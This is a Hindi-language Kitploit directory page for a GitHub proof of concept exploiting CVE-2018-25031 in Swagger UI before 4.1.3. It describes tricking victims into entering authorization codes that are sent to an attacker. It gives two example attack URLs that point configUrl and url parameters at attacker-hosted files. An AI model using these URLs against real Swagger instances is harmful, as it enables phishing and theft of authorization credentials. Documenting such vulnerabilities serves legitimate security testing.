Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2018-25031 — CVE-2018-25031 (Swagger UI XSS) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड configUrl/url पैरामीटर के माध्यम से प्राधिकरण कोड एक्सफिल्ट्रेट करता है। | Kitploit
उपकरण/GitHubGitHub/geozin/poc-cve-2018-25031
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणसामाजिक इंजीनियरिंग
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

CVE-2018-25031 (Swagger UI XSS) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्राफ्टेड configUrl/url पैरामीटर के माध्यम से प्राधिकरण कोड एक्सफिल्ट्रेट करता है।

रिपॉजिटरी देखें
1172 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-25031 - Swagger UI 4.1.3 से पहले

एक सरल POC (CVE-2018-25031) जो पीड़ित को प्राधिकरण कोड दर्ज करने के लिए धोखा देता है, जो फिर हमलावर को भेज दिया जाता है।
आप इसे XSS भेद्यता के साथ उपयोग कर सकते हैं https://github.com/VictorNS69/swagger-ui-xss

पैरामीटर ढूंढना और सही फ़ाइल निर्दिष्ट करना आवश्यक है: configUrl के लिए JSON फ़ाइल, और url के लिए YAML फ़ाइल।

उदाहरण:

https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

स्क्रीनशॉट:


जब पीड़ित प्राधिकरण कोड दर्ज करके API का उपयोग करने का प्रयास करता है और Execute पर क्लिक करता है, तो उन्हें कुछ भी प्रदर्शित नहीं होगा। हालांकि, प्राधिकरण कोड के साथ एक अनुरोध हमलावर के URL पर भेज दिया जाएगा।

संदर्भ:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

टूल डाउनलोड करें